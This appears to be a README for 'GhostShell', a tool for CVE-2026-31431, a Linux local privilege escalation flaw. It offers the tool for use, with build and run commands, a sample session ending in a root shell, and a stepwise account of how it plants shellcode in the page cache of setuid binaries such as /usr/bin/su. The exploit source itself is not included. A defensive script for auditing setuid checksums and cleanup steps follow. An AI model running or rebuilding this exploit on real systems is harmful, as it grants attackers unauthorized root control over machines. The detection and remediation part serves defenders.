CVE-2026-31431 — Local Privilege Escalation via Linux Kernel Page Cache Corruption
GhostShell is a local privilege escalation tool that exploits a flaw in the Linux kernel's authencesn AEAD crypto implementation to obtain a root shell from an unprivileged user account. It corrupts the in-memory page cache of a setuid-root binary (e.g. /usr/bin/su) by planting shellcode at its entry point, then executes it — gaining setuid(0) + setgid(0) and spawning a privileged /bin/sh. No on-disk file is modified; only the in-memory page cache is affected.
In short: you run it as a normal user, and it drops you into a root shell.
Discovered and disclosed by Theori / Xint. Full writeup: copy.fail
```
$ ./ghostshell
CVE-2026-31431 'Copy Fail'
Target: /usr/bin/su
Size: 63576 bytes
Entry offset: 0x1a50
Shellcode: 94 bytes (24 iterations)
[*] Checking if kernel is vulnerable...
[+] Kernel IS vulnerable.
[*] Corrupting page cache of /usr/bin/su with shellcode...
[*] Patching offset 0x01a50 (24/24) ...
[*] Verifying page cache corruption...
[+] Shellcode verified in page cache!
[*] Executing corrupted setuid binary...
[*] If successful, you should now have a root shell.
[*] No trace on disk. Only ghosts in the cache.
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
#
```
Affected kernels: Linux 4.14 (August 2017) through kernels patched in April 2026.
| OS | Kernel |
|---|---|
| Ubuntu 24.04 LTS | 6.17.0-22-generic |
⚠️ This exploit has only been tested on the system above. Your results may vary on other distributions or kernel versions.
- A vulnerable Linux kernel (see above)
- GCC (or any C compiler)
- Linux kernel UAPI headers (`<linux/if_alg.h>`), usually included with `linux-libc-dev`
- An unprivileged user account (no root needed to run the exploit)
Install build dependencies on Ubuntu/Debian:

```
sudo apt-get update
sudo apt-get install gcc linux-libc-dev
```

Build:

```
gcc -Wall -Wextra -o ghostshell ghostshell.c
```

No external libraries required.
Auto-detect target (checks common setuid binaries like su, sudo, passwd):

```
./ghostshell
```

Specify a target manually:

```
./ghostshell /usr/bin/sudo
```

If the kernel is vulnerable, you will be dropped into a root shell (`#`).
- Vulnerability check — Creates a temp file, mutates its first 4 bytes via the AEAD primitive, reads it back to confirm the page cache was modified.
- Target selection — Auto-detects a setuid-root binary and parses the ELF64 header to find the `_start` entry point offset.
- Page cache corruption — Writes 94 bytes of x86-64 shellcode to the entry point, 4 bytes per `patch_chunk()` call (24 iterations), using the AF_ALG `splice()` in-place decryption flaw.
- Execution — Calls `execl()` on the corrupted binary. The kernel loads it from the page cache and the shellcode runs with setuid-root privileges, spawning a root shell.
The exploit only corrupts the in-memory page cache. A simple reboot clears it entirely.

To drop caches without rebooting:

```
sudo sh -c 'echo 3 > /proc/sys/vm/drop_caches'
```

If dirty pages were written back to disk (unlikely but possible), reinstall the affected package:

```
sudo apt-get install --reinstall util-linux   # for /usr/bin/su
```

This tool is provided for educational and authorized security research purposes only. Unauthorized use against systems you do not own or have explicit permission to test is illegal. The author assumes no liability for misuse.
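Before dropping caches or reinstalling, a defender usually wants to know which setuid binaries were actually affected. The script below is an added example for that check; it is not part of GhostShell or the copy.fail writeup. Because `md5sum` reads a file through the page cache, a cache-only corruption of `/usr/bin/su` shows up as a checksum mismatch even though the on-disk bytes are untouched, and a written-back modification is caught the same way. It assumes the Debian/Ubuntu layout in which dpkg records `<md5>  <relative path>` lines under `/var/lib/dpkg/info/<package>.md5sums`; the manifest directory and filesystem root are parameters so the functions can be pointed at a test tree. The function names `expected_md5`, `check_binary` and `audit_setuid` are this example's own.

```shell
#!/bin/sh
# Added example (not GhostShell code): audit setuid-root binaries against the checksums
# the package manager recorded at install time. Reading the file goes through the page
# cache, so an in-memory-only corruption is visible here while it is still cached.
# Assumption: Debian/Ubuntu dpkg manifests, "<md5>  <path without leading slash>" per line.

# expected_md5 REL_PATH MANIFEST_DIR
#   Print the recorded md5 for REL_PATH (e.g. usr/bin/su); print nothing if unlisted.
expected_md5() {
    rel="$1"; manifest_dir="$2"
    cat "$manifest_dir"/*.md5sums 2>/dev/null \
        | awk -v p="$rel" '$2 == p { print $1; exit }'
}

# check_binary FILE MANIFEST_DIR [ROOT]
#   Exit status: 0 = matches the manifest, 1 = mismatch, 2 = not listed in any manifest.
#   ROOT defaults to /; pass a different root to check a staged or test tree.
check_binary() {
    file="$1"; manifest_dir="$2"; root="${3:-/}"
    rel="${file#"$root"}"; rel="${rel#/}"      # manifest paths have no leading slash
    want=$(expected_md5 "$rel" "$manifest_dir")
    [ -n "$want" ] || return 2
    have=$(md5sum "$file" | cut -d' ' -f1)     # reads via the page cache
    [ "$have" = "$want" ]
}

# audit_setuid DIR MANIFEST_DIR [ROOT]
#   Print one line per setuid file under DIR: OK, MISMATCH, or UNLISTED.
#   A MISMATCH line on a package-owned binary is what the page-cache corruption looks like.
audit_setuid() {
    dir="$1"; manifest_dir="$2"; root="${3:-/}"
    find "$dir" -type f -perm -4000 2>/dev/null | while IFS= read -r f; do
        rc=0; check_binary "$f" "$manifest_dir" "$root" || rc=$?
        case $rc in
            0) echo "OK        $f" ;;
            2) echo "UNLISTED  $f" ;;
            *) echo "MISMATCH  $f" ;;
        esac
    done
}

# On a real Ubuntu/Debian host:
#   audit_setuid /usr/bin /var/lib/dpkg/info
# Run it before `echo 3 > /proc/sys/vm/drop_caches`, since dropping caches also
# discards the evidence; reinstall any package whose binary reports MISMATCH.
```

`debsums -c` (Debian) and `rpm -Va` (RPM-based systems) perform the same comparison against their package databases. The caveat in both cases is that an attacker who already holds root can edit the on-host manifests, so a copy of known-good hashes kept off the machine is the stronger reference.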
This project is licensed under the MIT License.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.